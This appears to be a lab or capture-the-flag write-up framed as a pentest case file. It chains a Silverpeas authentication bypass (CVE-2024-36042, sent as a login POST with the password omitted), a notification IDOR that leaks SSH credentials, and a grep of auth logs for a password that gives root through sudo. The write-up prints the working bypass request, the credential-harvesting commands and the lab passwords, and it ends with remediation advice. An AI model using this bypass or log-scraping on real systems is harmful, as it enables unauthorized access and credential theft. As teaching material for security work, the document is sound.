Case file

Silverpeas auth bypass to SSH and sudo via auth logs

Silverpeas on 8080 vulnerable to CVE-2024-36042 (password parameter omission). Authenticated IDOR on notifications exposed SSH credentials for tim. Auth logs leaked tyler’s password; tyler had full sudo.

Foundations28 minLinux · CVE · Web · Credential Access
01

Engagement summary

Public marketing site leaked a username and product name. Silverpeas auth bypass plus notification IDOR produced SSH access. Log scraping and sudoers completed root.

Host silver-platter (10.10.12.168) ran nginx on 80 and Silverpeas behind 8080. Contact content disclosed username scr1ptkiddy. CVE-2024-36042 allowed authentication by omitting the password field on the login POST. Notification IDOR at ID 6 exposed tim’s SSH password. tim was in group adm and could read auth logs containing tyler’s password; tyler held (ALL) sudo.

Business impact

A single CMS authentication flaw plus chatty notifications and readable auth logs escalated from anonymous web to root. Patch Silverpeas, fix IDOR on notifications, restrict adm log access, and eliminate password material from syslog.

02

Recon and Silverpeas discovery

nmap and dirsearch located Silverpeas under :8080/silverpeas with a login JSP.

OPERATOR · NMAP

savvy@lab:~$ nmap 10.10.12.168 -sV -sC

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4

80/tcp open http nginx 1.18.0 (Ubuntu)

8080/tcp open http-proxy

OPERATOR · DIRSEARCH

savvy@lab:~$ dirsearch -u http://10.10.12.168:8080/silverpeas

302 - /silverpeas/;admin/ -> .../silverpeas/defaultLogin.jsp

200 - /silverpeas/password.js

03

CVE-2024-36042 authentication bypass

Intercepted login POST for scr1ptkiddy, removed the password parameter, followed redirects to an authenticated session.

We authenticated as scr1ptkiddy by submitting Login without a password field. The application accepted the truncated body and issued a valid session cookie.

HTTP

AuthenticationServlet (password omitted)

POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: 10.10.12.168:8080
Content-Type: application/x-www-form-urlencoded

Login=scr1ptkiddy

Finding

Notification resource ID 6 disclosed SSH credentials: tim / cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

04

SSH foothold and sudo via auth logs

SSH as tim. grep of /var/log/auth* recovered tyler’s password. tyler had (ALL : ALL) ALL.

OPERATOR · SSH

savvy@lab:~$ ssh tim@10.10.12.168

Welcome to Ubuntu 22.04.3 LTS

savvy@lab:~$ id

uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)

OPERATOR · LOG HARVEST

savvy@lab:~$ cat /var/log/auth* | grep -a -i pass

… tyler … _Zd_zx7N823/

savvy@lab:~$ su tyler

savvy@lab:~$ sudo -l

User tyler may run the following commands on silver-platter:

(ALL : ALL) ALL

savvy@lab:~$ sudo su

root@lab:~#

Remediation

Upgrade Silverpeas past CVE-2024-36042, authorize notification reads per user, remove passwords from auth logging, and restrict adm group membership.